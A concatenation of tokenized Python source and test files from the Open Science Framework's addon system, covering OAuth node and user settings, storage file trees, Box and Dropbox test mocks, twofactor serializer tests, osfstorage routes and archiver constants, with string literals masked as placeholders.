save ( ) <EOL> self . save ( ) <EOL> def to_json ( self , user ) : <EOL> ret = super ( AddonOAuthUserSettingsBase , self ) . to_json ( user ) <EOL> ret [ '<STR_LIT>' ] = self . serializer ( <EOL> user_settings = self <EOL> ) . serialized_accounts <EOL> return ret <EOL> def on_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( AddonOAuthUserSettingsBase , self ) . on_delete ( ) <EOL> nodes = [ Node . load ( node_id ) for node_id in self . oauth_grants . keys ( ) ] <EOL> for node in nodes : <EOL> node_addon = node . get_addon ( self . oauth_provider . short_name ) <EOL> if node_addon and node_addon . user_settings == self : <EOL> node_addon . clear_auth ( ) <EOL> class AddonNodeSettingsBase ( AddonSettingsBase ) : <EOL> owner = fields . ForeignField ( '<STR_LIT>' , index = True ) <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> @ property <EOL> def complete ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def configured ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . complete <EOL> @ property <EOL> def has_auth ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def to_json ( self , user ) : <EOL> ret = super ( AddonNodeSettingsBase , self ) . to_json ( user ) <EOL> ret . update ( { <EOL> '<STR_LIT:user>' : { <EOL> '<STR_LIT>' : self . owner . get_permissions ( user ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : self . owner . _id , <EOL> '<STR_LIT>' : self . owner . api_url , <EOL> '<STR_LIT:url>' : self . owner . url , <EOL> '<STR_LIT>' : self . owner . is_registration , <EOL> } , <EOL> '<STR_LIT>' : os . path . basename ( self . config . node_settings_template ) , <EOL> } ) <EOL> return ret <EOL> def render_config_error ( self , data ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template = lookup . get_template ( '<STR_LIT>' ) <EOL> return template . get_def ( '<STR_LIT>' ) . render ( <EOL> title = self . config . full_name , <EOL> name = self . config . 
short_name , <EOL> ** data <EOL> ) <EOL> def before_page_load ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def before_remove_contributor ( self , node , removed ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def after_remove_contributor ( self , node , removed , auth = None ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def before_make_public ( self , node ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def before_make_private ( self , node ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def after_set_privacy ( self , node , permissions ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def before_fork ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , "<STR_LIT>" ) : <EOL> if self . user_settings is None : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> ) <EOL> elif self . user_settings and self . user_settings . owner == user : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> ) <EOL> else : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> ) <EOL> def after_fork ( self , node , fork , user , save = True ) : <EOL> """<STR_LIT>""" <EOL> clone = self . clone ( ) <EOL> clone . owner = fork <EOL> if save : <EOL> clone . 
save ( ) <EOL> return clone , None <EOL> def before_register ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def after_register ( self , node , registration , user , save = True ) : <EOL> """<STR_LIT>""" <EOL> return None , None <EOL> def after_delete ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class GenericRootNode ( object ) : <EOL> path = '<STR_LIT:/>' <EOL> name = '<STR_LIT>' <EOL> class StorageAddonBase ( object ) : <EOL> """<STR_LIT>""" <EOL> root_node = GenericRootNode ( ) <EOL> @ property <EOL> def archive_folder_name ( self ) : <EOL> name = "<STR_LIT>" . format ( addon = self . config . full_name ) <EOL> folder_name = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) . lstrip ( '<STR_LIT:/>' ) . strip ( ) <EOL> if folder_name : <EOL> name = name + "<STR_LIT>" . format ( folder = folder_name ) <EOL> return name <EOL> def _get_fileobj_child_metadata ( self , filenode , user , cookie = None , version = None ) : <EOL> kwargs = dict ( <EOL> provider = self . config . short_name , <EOL> path = filenode . get ( '<STR_LIT:path>' , '<STR_LIT>' ) , <EOL> node = self . owner , <EOL> user = user , <EOL> view_only = True , <EOL> ) <EOL> if cookie : <EOL> kwargs [ '<STR_LIT>' ] = cookie <EOL> if version : <EOL> kwargs [ '<STR_LIT:version>' ] = version <EOL> metadata_url = waterbutler_url_for ( <EOL> '<STR_LIT>' , <EOL> ** kwargs <EOL> ) <EOL> res = requests . get ( metadata_url ) <EOL> if res . status_code != <NUM_LIT:200> : <EOL> raise HTTPError ( res . status_code , data = { <EOL> '<STR_LIT:error>' : res . json ( ) , <EOL> } ) <EOL> sleep ( <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> return res . json ( ) . get ( '<STR_LIT:data>' , [ ] ) <EOL> def _get_file_tree ( self , filenode = None , user = None , cookie = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> filenode = filenode or { <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : self . root_node . name , <EOL> } <EOL> if filenode . 
get ( '<STR_LIT>' ) == '<STR_LIT:file>' : <EOL> return filenode <EOL> elif '<STR_LIT:size>' in filenode : <EOL> return filenode <EOL> kwargs = { <EOL> '<STR_LIT:version>' : version , <EOL> '<STR_LIT>' : cookie , <EOL> } <EOL> filenode [ '<STR_LIT>' ] = [ <EOL> self . _get_file_tree ( child , user , cookie = cookie ) <EOL> for child in self . _get_fileobj_child_metadata ( filenode , user , ** kwargs ) <EOL> ] <EOL> return filenode <EOL> class AddonOAuthNodeSettingsBase ( AddonNodeSettingsBase ) : <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> external_account = fields . ForeignField ( '<STR_LIT>' ) <EOL> user_settings = fields . AbstractForeignField ( ) <EOL> oauth_provider = None <EOL> @ property <EOL> def folder_id ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> @ property <EOL> def folder_name ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> @ property <EOL> def folder_path ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> @ property <EOL> def nodelogger ( self ) : <EOL> auth = None <EOL> if self . user_settings : <EOL> auth = Auth ( self . user_settings . owner ) <EOL> self . _logger_class = getattr ( <EOL> self , <EOL> '<STR_LIT>' , <EOL> type ( <EOL> '<STR_LIT>' . format ( self . config . short_name . capitalize ( ) ) , <EOL> ( logger . AddonNodeLogger , ) , <EOL> { '<STR_LIT>' : self . config . short_name } <EOL> ) <EOL> ) <EOL> return self . _logger_class ( <EOL> node = self . owner , <EOL> auth = auth <EOL> ) <EOL> @ property <EOL> def complete ( self ) : <EOL> return bool ( <EOL> self . has_auth and <EOL> self . external_account and <EOL> self . user_settings . verify_oauth_access ( <EOL> node = self . owner , <EOL> external_account = self . external_account , <EOL> ) <EOL> ) <EOL> @ property <EOL> def configured ( self ) : <EOL> return bool ( <EOL> self . complete and <EOL> ( self . folder_id or self . folder_name or self . 
folder_path ) <EOL> ) <EOL> @ property <EOL> def has_auth ( self ) : <EOL> """<STR_LIT>""" <EOL> return bool ( <EOL> self . user_settings and self . user_settings . has_auth <EOL> ) and bool ( <EOL> self . external_account and self . user_settings . verify_oauth_access ( <EOL> node = self . owner , <EOL> external_account = self . external_account <EOL> ) <EOL> ) <EOL> def clear_settings ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def set_auth ( self , external_account , user , metadata = None , log = True ) : <EOL> """<STR_LIT>""" <EOL> user_settings = user . get_or_add_addon ( self . oauth_provider . short_name ) <EOL> user_settings . grant_oauth_access ( <EOL> node = self . owner , <EOL> external_account = external_account , <EOL> metadata = metadata <EOL> ) <EOL> user_settings . save ( ) <EOL> self . user_settings = user_settings <EOL> self . external_account = external_account <EOL> if log : <EOL> self . nodelogger . log ( action = "<STR_LIT>" , save = True ) <EOL> self . save ( ) <EOL> def deauthorize ( self , auth = None , add_log = False ) : <EOL> """<STR_LIT>""" <EOL> self . clear_auth ( ) <EOL> def clear_auth ( self ) : <EOL> """<STR_LIT>""" <EOL> self . external_account = None <EOL> self . user_settings = None <EOL> self . save ( ) <EOL> def before_remove_contributor_message ( self , node , removed ) : <EOL> """<STR_LIT>""" <EOL> if self . has_auth and self . user_settings . owner == removed : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> name = removed . fullname , <EOL> ) <EOL> before_remove_contributor = before_remove_contributor_message <EOL> def after_remove_contributor ( self , node , removed , auth = None ) : <EOL> """<STR_LIT>""" <EOL> if self . user_settings and self . user_settings . owner == removed : <EOL> self . user_settings . oauth_grants [ self . owner . _id ] . 
pop ( self . external_account . _id ) <EOL> self . clear_auth ( ) <EOL> message = ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = markupsafe . escape ( node . category_display ) , <EOL> title = markupsafe . escape ( node . title ) , <EOL> user = markupsafe . escape ( removed . fullname ) <EOL> ) <EOL> if not auth or auth . user != removed : <EOL> url = node . web_url_for ( '<STR_LIT>' ) <EOL> message += ( <EOL> u'<STR_LIT>' <EOL> ) . format ( url = url ) <EOL> return message <EOL> def after_fork ( self , node , fork , user , save = True ) : <EOL> """<STR_LIT>""" <EOL> clone , _ = super ( AddonOAuthNodeSettingsBase , self ) . after_fork ( <EOL> node = node , <EOL> fork = fork , <EOL> user = user , <EOL> save = False , <EOL> ) <EOL> if self . has_auth and self . user_settings . owner == user : <EOL> metadata = None <EOL> if self . complete : <EOL> try : <EOL> metadata = self . user_settings . oauth_grants [ node . _id ] [ self . external_account . _id ] <EOL> except ( KeyError , AttributeError ) : <EOL> pass <EOL> clone . set_auth ( self . external_account , user , metadata = metadata , log = False ) <EOL> message = '<STR_LIT>' . format ( <EOL> addon = self . config . full_name , <EOL> category = fork . project_or_component , <EOL> ) <EOL> else : <EOL> message = ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> url = fork . web_url_for ( '<STR_LIT>' ) , <EOL> category = fork . project_or_component , <EOL> ) <EOL> if save : <EOL> clone . save ( ) <EOL> return clone , message <EOL> def before_register_message ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> if self . has_auth : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . 
project_or_component , <EOL> ) <EOL> before_register = before_register_message <EOL> def serialize_waterbutler_credentials ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def serialize_waterbutler_settings ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def init_addon ( app , addon_name , routes = True ) : <EOL> """<STR_LIT>""" <EOL> import_path = '<STR_LIT>' . format ( addon_name ) <EOL> addon_module = importlib . import_module ( import_path ) <EOL> data = vars ( addon_module ) <EOL> if routes : <EOL> for route_group in getattr ( addon_module , '<STR_LIT>' , [ ] ) : <EOL> process_rules ( app , ** route_group ) <EOL> return AddonConfig ( <EOL> ** { <EOL> key . lower ( ) : value <EOL> for key , value in data . iteritems ( ) <EOL> } <EOL> ) </s>
<s> import mock <EOL> from contextlib import contextmanager <EOL> from modularodm import storage <EOL> from framework . mongo import set_up_storage <EOL> from website . addons . base . testing import OAuthAddonTestCaseMixin , AddonTestCase <EOL> from website . addons . box import MODELS <EOL> from website . addons . box . model import Box <EOL> from website . addons . box . tests . factories import BoxAccountFactory <EOL> def init_storage ( ) : <EOL> set_up_storage ( MODELS , storage_class = storage . MongoStorage ) <EOL> class BoxAddonTestCase ( OAuthAddonTestCaseMixin , AddonTestCase ) : <EOL> ADDON_SHORT_NAME = '<STR_LIT>' <EOL> ExternalAccountFactory = BoxAccountFactory <EOL> Provider = Box <EOL> def set_node_settings ( self , settings ) : <EOL> super ( BoxAddonTestCase , self ) . set_node_settings ( settings ) <EOL> settings . folder_id = '<STR_LIT>' <EOL> settings . folder_name = '<STR_LIT>' <EOL> mock_responses = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:file>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:file>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> ] <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:root>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT:size>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:path>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:root>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:size>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:path>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:root>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } , <EOL> { <EOL> u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : True , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:path>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT:root>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:size>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : False <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } , <EOL> '<STR_LIT>' : { <EOL> u'<STR_LIT:id>' : '<STR_LIT:id>' , <EOL> u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : False , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:path>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : <NUM_LIT:10> , <EOL> u'<STR_LIT:root>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:size>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : False <EOL> } , 
<EOL> '<STR_LIT>' : [ { u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : True , <EOL> u'<STR_LIT>' : False , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:path>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT:root>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:size>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : True } , <EOL> { u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : False , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:path>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT:root>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:size>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : True } ] <EOL> } <EOL> class MockBox ( object ) : <EOL> def put_file ( self , full_path , file_obj , overwrite = False , parent_rev = None ) : <EOL> return mock_responses [ '<STR_LIT>' ] <EOL> def metadata ( self , path , list = True , file_limit = <NUM_LIT> , hash = None , rev = None , <EOL> include_deleted = False ) : <EOL> if list : <EOL> ret = mock_responses [ '<STR_LIT>' ] <EOL> else : <EOL> ret = mock_responses [ '<STR_LIT>' ] <EOL> ret [ '<STR_LIT:path>' ] = path <EOL> return ret <EOL> def get_folder ( * args , ** kwargs ) : <EOL> return mock_responses [ '<STR_LIT>' ] <EOL> def get_file_and_metadata ( * args , ** kwargs ) : <EOL> pass <EOL> def file_delete ( self , path ) : <EOL> return mock_responses [ '<STR_LIT>' ] <EOL> def revisions ( self , path ) : <EOL> ret = mock_responses [ '<STR_LIT>' ] <EOL> for each in ret : <EOL> each [ '<STR_LIT:path>' ] = path <EOL> return ret <EOL> def get_user_info ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> @ contextmanager <EOL> def patch_client ( target , mock_client = None ) : <EOL> """<STR_LIT>""" <EOL> with mock . 
patch ( target ) as client_getter : <EOL> client = mock_client or MockBox ( ) <EOL> client_getter . return_value = client <EOL> yield client </s>
<s> import mock <EOL> from nose . tools import * <EOL> from tests . base import OsfTestCase <EOL> from website . addons . dropbox . tests . factories import ( <EOL> DropboxUserSettingsFactory , <EOL> DropboxNodeSettingsFactory , <EOL> DropboxAccountFactory <EOL> ) <EOL> from website . addons . dropbox . model import DropboxNodeSettings <EOL> from website . addons . base import testing <EOL> class TestNodeSettings ( testing . models . OAuthAddonNodeSettingsTestSuiteMixin , OsfTestCase ) : <EOL> short_name = '<STR_LIT>' <EOL> full_name = '<STR_LIT>' <EOL> ExternalAccountFactory = DropboxAccountFactory <EOL> NodeSettingsFactory = DropboxNodeSettingsFactory <EOL> NodeSettingsClass = DropboxNodeSettings <EOL> UserSettingsFactory = DropboxUserSettingsFactory <EOL> def _node_settings_class_kwargs ( self , node , user_settings ) : <EOL> return { <EOL> '<STR_LIT>' : self . user_settings , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . node <EOL> } <EOL> def test_folder_defaults_to_none ( self ) : <EOL> node_settings = DropboxNodeSettings ( user_settings = self . user_settings ) <EOL> node_settings . save ( ) <EOL> assert_is_none ( node_settings . folder ) <EOL> @ mock . patch ( <EOL> '<STR_LIT>' , <EOL> mock . PropertyMock ( ) <EOL> ) <EOL> def test_complete_has_auth_not_verified ( self ) : <EOL> super ( TestNodeSettings , self ) . test_complete_has_auth_not_verified ( ) <EOL> class TestUserSettings ( testing . models . OAuthAddonUserSettingTestSuiteMixin , OsfTestCase ) : <EOL> short_name = '<STR_LIT>' <EOL> full_name = '<STR_LIT>' <EOL> ExternalAccountFactory = DropboxAccountFactory </s>
<s> """<STR_LIT>""" <EOL> from nose . tools import * <EOL> from tests . base import OsfTestCase <EOL> from website . addons . forward . tests . factories import ForwardSettingsFactory <EOL> from website . addons . forward import utils <EOL> class TestUtils ( OsfTestCase ) : <EOL> def test_serialize_settings ( self ) : <EOL> node_settings = ForwardSettingsFactory ( ) <EOL> serialized = utils . serialize_settings ( node_settings ) <EOL> assert_equal ( <EOL> serialized , <EOL> { <EOL> '<STR_LIT:url>' : node_settings . url , <EOL> '<STR_LIT:label>' : node_settings . label , <EOL> '<STR_LIT>' : node_settings . redirect_bool , <EOL> '<STR_LIT>' : node_settings . redirect_secs , <EOL> } <EOL> ) <EOL> def test_settings_complete_true ( self ) : <EOL> node_settings = ForwardSettingsFactory ( ) <EOL> assert_true ( utils . settings_complete ( node_settings ) ) <EOL> def test_settings_complete_true_no_redirect ( self ) : <EOL> """<STR_LIT>""" <EOL> node_settings = ForwardSettingsFactory ( redirect_bool = False ) <EOL> assert_true ( utils . settings_complete ( node_settings ) ) <EOL> def test_settings_complete_false ( self ) : <EOL> node_settings = ForwardSettingsFactory ( url = None ) <EOL> assert_false ( utils . settings_complete ( node_settings ) ) </s>
<s> CLIENT_ID = '<STR_LIT>' <EOL> CLIENT_SECRET = '<STR_LIT>' <EOL> REFRESH_TIME = <NUM_LIT:5> * <NUM_LIT> <EOL> OAUTH_SCOPE = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> OAUTH_BASE_URL = '<STR_LIT>' <EOL> API_BASE_URL = '<STR_LIT>' </s>
# Route table for the osfstorage addon API. All URL patterns, HTTP-method
# strings, and endpoint names are masked as '<STR_LIT>' in this corpus and are
# preserved verbatim; the Rule(...) structure is reconstructed from the token
# stream.
from framework.routing import Rule, json_renderer

from website.addons.osfstorage import views

api_routes = {
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': [
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_get_metadata,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_delete,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_download,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_get_revisions,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_get_lineage,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_create_child,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_get_children,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_update_metadata,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_move_hook,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_copy_hook,
            json_renderer,
        ),
        Rule(
            [
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_add_tag,
            json_renderer
        ),
        Rule(
            [
                '<STR_LIT>',
            ],
            '<STR_LIT>',
            views.osfstorage_remove_tag,
            json_renderer
        ),
    ],
}
# Tests for the twofactor addon serializers. Masked '<STR_LIT>' literals are
# preserved verbatim from the tokenized corpus.
from nose.tools import *

from tests.base import OsfTestCase
from tests.factories import AuthUserFactory
from framework.auth import Auth
from website.app import init_app
from website.addons.twofactor.utils import serialize_settings, serialize_urls


class TestUtils(OsfTestCase):

    def setUp(self):
        super(TestUtils, self).setUp()
        # A user with the twofactor addon attached; both the addon record and
        # the settings object are cached for the tests below.
        self.user = AuthUserFactory()
        self.user_addon = self.user.get_or_add_addon('<STR_LIT>')
        self.user_settings = self.user.get_addon('<STR_LIT>')

    def test_serialize_urls_enabled(self):
        # With an addon present, all expected keys exist and the otpauth URL
        # comes from the addon itself.
        urls = serialize_urls(self.user_addon)
        for key in ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']:
            assert_in(key, urls)
        assert_equal(urls['<STR_LIT>'], self.user_addon.otpauth_url)

    def test_serialize_urls_disabled(self):
        # With no addon, the same keys exist but the otpauth URL is a default.
        urls = serialize_urls(None)
        for key in ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']:
            assert_in(key, urls)
        assert_equal(urls['<STR_LIT>'], '<STR_LIT>')

    def test_serialize_settings_enabled_and_unconfirmed(self):
        settings = serialize_settings(Auth(self.user))
        assert_true(settings['<STR_LIT>'])
        assert_false(settings['<STR_LIT>'])
        assert_equal(settings['<STR_LIT>'], self.user_addon.totp_secret_b32)
        assert_equal(settings['<STR_LIT>'], self.user_addon.totp_drift)

    def test_serialize_settings_enabled_and_confirmed(self):
        # Confirming the addon flips the confirmed flag in the serialization.
        self.user_addon.is_confirmed = True
        self.user_addon.save()
        settings = serialize_settings(Auth(self.user))
        assert_true(settings['<STR_LIT>'])
        assert_true(settings['<STR_LIT>'])
        assert_equal(settings['<STR_LIT>'], self.user_addon.totp_secret_b32)
        assert_equal(settings['<STR_LIT>'], self.user_addon.totp_drift)

    def test_serialize_settings_disabled(self):
        # A user without the addon serializes to all-falsy/None values.
        user = AuthUserFactory()
        settings = serialize_settings(Auth(user))
        assert_false(settings['<STR_LIT>'])
        assert_false(settings['<STR_LIT>'])
        assert_equal(settings['<STR_LIT>'], None)
        assert_equal(settings['<STR_LIT>'], None)
# Archiver status constants. The actual status strings are masked as
# '<STR_LIT>' in this corpus and preserved verbatim (which collapses the
# failure-status set to a single member in this detokenized form).
ARCHIVER_INITIATED = '<STR_LIT>'
ARCHIVER_FAILURE = '<STR_LIT>'
ARCHIVER_SUCCESS = '<STR_LIT>'
ARCHIVER_SENT = '<STR_LIT>'
ARCHIVER_PENDING = '<STR_LIT>'
ARCHIVER_CHECKING = '<STR_LIT>'
ARCHIVER_SENDING = '<STR_LIT>'
ARCHIVER_NETWORK_ERROR = '<STR_LIT>'
ARCHIVER_SIZE_EXCEEDED = '<STR_LIT>'
ARCHIVER_FILE_NOT_FOUND = '<STR_LIT>'
ARCHIVER_UNCAUGHT_ERROR = '<STR_LIT>'

# Statuses that count as a failed archive run.
ARCHIVER_FAILURE_STATUSES = {
    ARCHIVER_FAILURE,
    ARCHIVER_NETWORK_ERROR,
    ARCHIVER_SIZE_EXCEEDED,
    ARCHIVER_FILE_NOT_FOUND,
    ARCHIVER_UNCAUGHT_ERROR,
}

NO_ARCHIVE_LIMIT = '<STR_LIT>'


class StatResult(object):
    """<STR_LIT>"""

    # A leaf result always represents exactly one file.
    num_files = 1

    def __init__(self, target_id, target_name, disk_usage=0):
        self.target_id = target_id
        self.target_name = target_name
        # Stored as float so aggregation sums are uniform.
        self.disk_usage = float(disk_usage)

    def __str__(self):
        return str(self._to_dict())

    def _to_dict(self):
        # NOTE(review): the three keys are identical masked placeholders here,
        # so this dict collapses to one entry in the detokenized form; the keys
        # differ in the real source.
        return {
            '<STR_LIT>': self.target_id,
            '<STR_LIT>': self.target_name,
            '<STR_LIT>': self.disk_usage,
        }


class AggregateStatResult(object):
    """<STR_LIT>"""

    def __init__(self, target_id, target_name, targets=None):
        self.target_id = target_id
        self.target_name = target_name
        # Drop falsy entries (e.g. None placeholders) from the given targets.
